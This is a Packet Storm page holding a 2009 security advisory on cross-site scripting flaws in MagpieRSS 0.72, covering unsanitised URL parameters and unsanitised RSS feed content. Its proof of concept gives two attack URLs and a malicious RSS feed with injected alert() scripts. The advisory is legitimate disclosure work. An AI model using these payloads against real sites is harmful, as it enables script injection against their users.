what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

MagpieRSS Cross Site Scripting

MagpieRSS Cross Site Scripting
Posted May 8, 2009
Authored by Justin C. Klein Keane

MagpieRSS suffers from multiple cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss
SHA-256 | 9f9fc3f5aaf0c5225c3c590d26077fc3ec630079cb268330145efb47d97cbf05
Download | Favorite | View

MagpieRSS Cross Site Scripting

Change Mirror Download
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- -= MagpieRSS Multiple XSS Vulnerabilities =-

May 6, 2009
Author: Justin C. Klein Keane <justin@madirish.net>
Software:  MagpieRSS (http://magpierss.sourceforge.net/)
Version Tested:  magpierss-0.72
Vendor notified
Full details can also be found at
http://lampsecurity.org/magpierss-vulnerability


MagpieRSS (http://magpierss.sourceforge.net/) is a PHP based RSS reader.
 "MagpieRSS is compatible with RSS 0.9 through RSS 1.0. Also parses RSS
1.0's modules, RSS 2.0, and Atom. (with a few exceptions)."  Magpie
suffers from multiple cross site scripting (XSS) vulnerabilities.  The
first class of vulnerability is due to the failure to sanitize URL
variables in scripts included with the MagpieRSS distribution.
Specifically the $url variable is crafted from $_GET['url'] and used in
display to users in:

magpierss-0.72/scripts/magpie_simple.php
magpierss-0.72/scripts/magpie_debug.php

The file magpierss-0.72/scripts/magpie_slashbox.php uses the same $url
variable, but cast from $_GET['rss_url'].

The second class of XSS results from MagpieRSS' failure to sanitize any
of the RSS feeds it draws using magpierss-0.72/rss_fetch.inc.  This
could result in cross site scripting vulnerabilities being injected by
malicious RSS feeds.

- -=Proof of concept=-

The following links can be used to trigger XSS in Magpie's sample scripts:

http://192.168.0.2site/magpierss-0.72/scripts/magpie_debug.php?url=%22%3E%3Cscript%3Ealert(%27xss%27);%3C/script
http://192.168.0.2/magpierss-0.72/scripts/magpie_simple.php?url=%22%3E%3Cscript%3Ealert(%27xss%27);%3C/script

The following malicious RSS feed can be used to exploit Magpie's RSS
rendering:

<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0" xml:base="http://justin.madirish.net"
xmlns:dc="http://purl.org/dc/elements/1.1/">
<channel>
 <title>Justin.MadIrish.net <script>alert('xss title');</script>-
Justin's Personal Homepage</title>
 <link>http://justin.madirish.net</link>
 <description>Close personal friends with Evil Eve.</description>
 <language>en</language>

<item>
 <title>Disturbing<script>alert('xss title');</script>
XSS<script>alert('xss title');</script></title>
 <link>http://justin.madirish.net/node/343 <script>alert('xss
link');</script></link>
 <description>foobar</description>
 <pubDate>Wed, 04 Mar 2009 13:42:09 +0000</pubDate>
 <dc:creator>justin</dc:creator>
 <guid isPermaLink="false">343 at http://justin.madirish.net</guid>

</item>
</channel>
</rss>

- --
Justin C. Klein Keane
http://www.MadIrish.net
http://www.LAMPSecurity.org
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iQD1AwUBSgRhSZEpbGy7DdYAAQKdYQcAqeMh+Xb0tNPOtaNo7cZx/ephiLSwsjYs
ij8noyk1W3ONThKYiGqju9z6493DKhAWSDbXEqkFmZCVquSwYaPNIsCUbza1wC0i
iy01RJPCcjB2jzfj4lCXNaDrzK3SZnsBlRS3jK5AYo3C9/msLA/wiSmpkltVvXxI
G7AIVFOxNVHmhyKtj+jJC0Wv+IoNj1RstKZ3kkEe1RnZsZ5ntv+gxsEkVr/Z7eiM
EmxzZwDvKMHCnuhgMG0ZcZGMcB+DEjLw5keKAvlXojEottZIESoynp4rsF0SVE4G
M5uacRMg93U=
=sY6i
-----END PGP SIGNATURE-----

Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    0 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close